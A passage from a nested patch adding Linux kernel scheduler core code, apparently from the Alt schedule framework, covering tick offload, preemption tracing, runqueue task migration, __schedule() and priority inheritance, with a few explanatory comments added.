++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	cancel_delayed_work_sync(&twork->work);
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in equals the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
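++
++/*
++ * Example (editor's illustration): these are the slow-path primitives
++ * behind the usual nesting API; a section such as
++ *
++ *   preempt_disable();      // preempt_count += 1
++ *   ...critical section...
++ *   preempt_enable();       // preempt_count -= 1, may reschedule
++ *
++ * starts latency timing in preempt_latency_start() on the outermost
++ * disable and stops it in preempt_latency_stop() on the matching enable.
++ */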
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	if (panic_on_warn)
++		panic("scheduling while atomic\n");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_idle_mask->bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
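++
++/*
++ * Worked example of the batching above: with nine runnable tasks on @rq
++ * and the default sysctl_sched_nr_migrate of 32, nr_tries starts at
++ * min(9 / 2, 32) = 4, so at most four candidates are examined (and at
++ * most four tasks pulled) per invocation.
++ */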
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired, as there's
++ * no point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
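++
++/*
++ * Illustration of the optimization noted above: with the !PREEMPT_RT
++ * definition of SM_MASK_PREEMPT as ~0U, a test such as
++ *
++ *	if (!(sched_mode & SM_MASK_PREEMPT))
++ *
++ * folds down to the plain zero check
++ *
++ *	if (!sched_mode)
++ *
++ * so the AND disappears entirely from the generated code.
++ */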
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outermost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* Bypass the sched_feat(HRTICK) check, which the Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev->flags & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu, prev);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_preempt_mask(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() relies on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disabled() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return.
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note that this is called and returns with IRQs disabled. This
++ * protects us against recursive calls from IRQ context.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that it takes a lot of trickery to make this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a no-no in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ are active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
